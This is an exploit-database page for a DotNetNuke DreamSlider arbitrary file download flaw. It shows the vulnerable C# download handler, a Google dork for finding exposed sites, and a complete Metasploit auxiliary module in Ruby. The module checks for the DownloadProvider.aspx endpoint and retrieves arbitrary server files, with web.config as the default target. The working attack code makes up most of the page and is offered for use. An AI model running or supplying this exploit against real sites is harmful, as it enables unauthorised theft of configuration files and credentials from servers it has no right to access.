0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download Exploit

Author

Glafkos Charalambous

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 01.01.02
# Vendor: DreamSlider
# Vendor URL: http://www.dreamslider.com/
# Google Dork: inurl:/DesktopModules/DreamSlider/
# CVE: 
#
# Description
# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
#
# Vulnerable Code
#
# namespace DotNetNuke.Modules.DreamSlider
# {
#    using System;
#    using System.IO;
#    using System.Web.SessionState;
#    using System.Web.UI;
#
#    public class DownloadProvider : Page, IRequiresSessionState
#    {
#        protected void Page_Load(object sender, EventArgs e)
#        {
#            if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
#            {
#                string path = base.Request.QueryString["File"];
#                string fileName = Path.GetFileName(path);
#                base.Response.ContentType = "application/octet-stream";
#                base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
#                base.Response.WriteFile(path);
#                base.Response.End();
#            }
#        }
#    }
# }
 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking
 
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'DotNetNuke DreamSlider Arbitrary File Download',
      'Description'    => %q{
        This module exploits an unauthenticated arbitrary file download vulnerability in DNN
    DreamSlider version 01.01.02 and below.
      },
      'Author'         =>
        [
          'Glafkos Charalambous', # Discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'DisclosureDate' => 'Mar 23 2015'))
 
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
        OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
      ], self.class)
  end
 
  def check
    begin
 
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
        'cookie' => datastore['Cookie'],
      })
 
    if res && res.code == 200 and res.body.to_s =~ /Download Provider/
       return Exploit::CheckCode::Vulnerable
    else
       return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Safe
   end
  end
 
  def run
    begin
      print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
 
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
    'cookie' => datastore['Cookie'],
      })
 
    rescue Rex::ConnectionError
      print_error("#{peer} - Could not connect.")
      return
    end
 
    if res && res.code == 200
      if res.body.to_s.bytesize == 0
        print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
        return
      end
 
      fileName = datastore['FILENAME']
 
      path = store_loot(
        'ds.http',
        'application/octet-stream',
        datastore['RHOST'],
        res.body,
        fileName
      )
      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Failed to download file.")
    end
  end
end

#  0day.today [2024-11-04]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download Exploit

Report Error

Report Error